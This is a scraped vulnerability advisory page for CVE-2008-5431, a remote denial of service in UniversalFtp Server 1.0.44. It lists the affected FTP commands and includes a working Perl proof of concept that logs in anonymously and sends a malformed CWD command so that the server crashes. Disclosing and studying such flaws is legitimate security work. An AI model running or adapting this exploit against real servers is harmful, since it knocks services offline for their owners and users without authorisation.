|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
If you have found a vulnerability, please send to our SecurityAlert Database : secalert()securityreason()com
Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com |
|
|
Home SecurityAlert Database |
|
|
Topic : | UniversalFtp Server 1.0.44 Multiple Remote Denial of service
|
SecurityAlert : 4722
CVE : CVE-2008-5431
CWE : CWE-20
SecurityRisk : Medium (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : securfrog gmail com
Published : 15.12.2008
Affected Software : | 5e5:teamtek_universal_ftp_server:1.0.50
5e5:teamtek_universal_ftp_server:1.0.44 |
 Advisory Content : # UniversalFtp Server 1.0.44 Multiple Remote #Denial of service
#
#@nolife : This bug has been found with a brain , ten fingers, a keyboard ,
and a laptop , one of my best Tool i ever tryed. Stay tuned for more tools
hint .
#
#
# Réponse: 226 Completed...
# Statut: Liste du répertoire complétée
# Commande : LIST aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...... .........
...........
# Réponse: 150 Directory...
# Statut: ftpcontrolsocket.cpp(1764): Waiting for replies to skip before
sending next command... caller=0p12e69f8 --> 0_o
#
#functions vuln : CWD (2 A) , LIST ( 4102 A) ,PORT (2 A)
#
#
# PoC :
use Net::FTP;
(($target = $ARGV[0])) || die "usage:$0 <target> <port>";
my $user = "anonymous";
my $pass = "something";
print "Trying to connect to :$target...\n";
$ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die "could not
connect";
print "Connected!\n";
$ftp->login($user, $pass);
$ftp->cwd("AA");
print "Poc Successfull the server should down now \n";
$ftp->quit;
References :
http://www.securityfocus.com/archive/1/archive/1/488142/100/200/threaded
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|
|
|
|